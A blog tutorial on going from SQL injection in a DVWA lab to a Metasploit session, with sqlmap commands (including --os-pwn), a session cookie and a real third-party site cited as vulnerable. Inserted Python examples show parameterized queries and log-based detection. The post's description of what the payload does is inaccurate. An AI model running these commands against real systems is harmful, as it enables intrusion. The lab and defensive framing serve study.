Saturday, August 17, 2019

SQL injection to Metasploit session

Wassap people, I am him, the one and only Laughing Man, back with yet another post, this one on going from SQL injection to a Metasploit session. I know most of you are thinking "Laughing Man, you're talking shit". Well sorry lads, I'm not. Metasploit Framework has many uses, not just payloads; it can do almost anything from recon to exploiting. For this I've set up a lab with DVWA, so let's start, lads.

What is SQL injection

SQL injection is a code injection technique that might destroy your database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements, via web page input.


What is Metasploit Framework

The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development.


What is DVWA

DVWA is the Damn Vulnerable Web App, coded in PHP/MySQL. Seriously, it is too vulnerable. In this app security professionals and ethical hackers test their skills and run their tools in a legal environment. It also helps web developers better understand the processes of securing web applications, and helps teachers and students teach and learn web application security in a safe environment.
The aim of DVWA is to practice some of the most common web vulnerabilities, with various difficulty levels.


What is Burp Suite

Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications.

What is sqlmap

sqlmap is open source software that is used to detect and exploit database vulnerabilities and provides options for injecting malicious code into them. It is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws, with its user interface in the terminal.

How to perform the attack

First of all we get a target. This is my target: http://192.168.8.101/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#
Now that I have my target I can check whether it is vulnerable to SQL injection. What we do is put a ' right after the 1 in the URL, so the URL looks like this: http://192.168.8.101/DVWA/vulnerabilities/sqli/?id=1'&Submit=Submit#
You are looking for this message when you add the ' at the end of the URL:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
For example http://www.asfaa.org/members.php?id=1'
As you can see in this image, when we add the ' at the end of the URL it tells us there's an error:
"Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /nfs/c05/h02/mnt/83231/domains/asfaa.org/html/members.php on line 67"
When we get this error we can use tools like sqlmap, Burp Suite, etc.
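
Why the single quote produces that syntax error, and how a parameterized query removes the flaw, as an added example (not code from DVWA or from this post). It assumes the page pastes id between quotes when building its query, as the error text suggests; the table, rows and function names are made up, and an in-memory SQLite database stands in for MariaDB.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; in-memory SQLite stands in for the lab database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "admin"), (2, "alice", "example"), (3, "bob", "example")])
    return db

def lookup_vulnerable(db, user_id):
    # The request value is pasted into the statement, so a quote inside it
    # becomes SQL syntax instead of data.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # Echoing the database error to the page is what confirms the flaw.
        return "SQL error: %s" % exc

def lookup_parameterized(db, user_id):
    # Placeholder binding: the value travels separately from the SQL text,
    # so quotes in it are compared as data and never parsed.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def lookup_validated(db, user_id):
    # Defence in depth: id is numeric, so reject anything else up front.
    if not re.fullmatch(r"[0-9]{1,10}", str(user_id)):
        return []
    return lookup_parameterized(db, int(user_id))

if __name__ == "__main__":
    db = make_db()
    for value in ["1", "1'", "1' OR '1'='1"]:
        print(repr(value))
        print("  vulnerable:   ", lookup_vulnerable(db, value))
        print("  parameterized:", lookup_parameterized(db, value))
        print("  validated:    ", lookup_validated(db, value))
```

The fixed versions also never return the raw database error to the client, which removes the signal the quote test relies on.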

Now we need to set up the Burp Suite proxy in Firefox. Type about:preferences into the URL bar in Firefox to get to the settings, then scroll down to Network.
Then set the proxy for Burp Suite.

Now we load up Burp Suite: open the terminal and type burpsuite, or go to the top left of the screen to Applications, then Web Application Analysis, and click Burp Suite.

Now when we add the ' to the URL, Burp Suite will pop up.

The cookie we need is Cookie: security=low; security=low; PHPSESSID=4kaa6819siab01k545959q45v0

Now we open a new terminal and type:
sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --dbs


Now we type:
sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --msf-path=/usr/share/metasploit-framework/ --os-pwn --tmp-path="C:/Docments and settings/Administrator/Local Settings/Temp"


Now we pick the payload. I mostly pick PHP.

This will add the payload to the site and inject it into the browser of the viewers.

Showing the proof it was connected:
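
From the defender's side, the requests in this walkthrough leave traces in the web server's access log. The following added example (not part of the original post) flags them in constructed Apache combined-format lines; the log lines, the sqlmap version in the User-Agent, the regexes and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Apache combined format); times and client IP are made up.
SAMPLE_LOG = """\
192.168.8.50 - - [17/Aug/2019:10:01:02 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.8.50 - - [17/Aug/2019:10:01:09 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.8.50 - - [17/Aug/2019:10:03:40 +0000] "POST /DVWA/vulnerabilities/sqli/ HTTP/1.1" 200 4498 "-" "sqlmap/1.3.8#stable (http://sqlmap.org)"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')
# Heuristic only: quotes, comment markers and a few SQL keywords in a parameter value.
SQL_META = re.compile(r"['\"]|--|/\*|\b(union|select|outfile|sleep)\b", re.I)

def classify(line):
    """Return (client_ip, [reasons]) for one log line, or None if unparsable."""
    m = LINE.match(line)
    if not m:
        return None
    ip, method, target, status, agent = m.groups()
    reasons = []
    if "sqlmap" in agent.lower():
        # Weak signal: the User-Agent header is client-controlled.
        reasons.append("sqlmap user-agent")
    # parse_qs percent-decodes, so %27 is matched as a quote.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        if any(SQL_META.search(v) for v in values):
            reasons.append("SQL metacharacter in %s" % name)
    return ip, reasons

def scan(log_text):
    """Collect every parsed line that raised at least one reason."""
    hits = []
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[1]:
            hits.append(result)
    return hits

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, "; ".join(reasons))
```

Because the sqlmap commands above send id in the POST body with --data, the access log shows only the User-Agent for those requests; inspecting the body needs a WAF or application-level logging.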

There ya have it, lads and gals: how to use sqlmap to get a Metasploit session. Don't use this for the wrong reasons; hacking is against the law unless you have the consent of the owner.
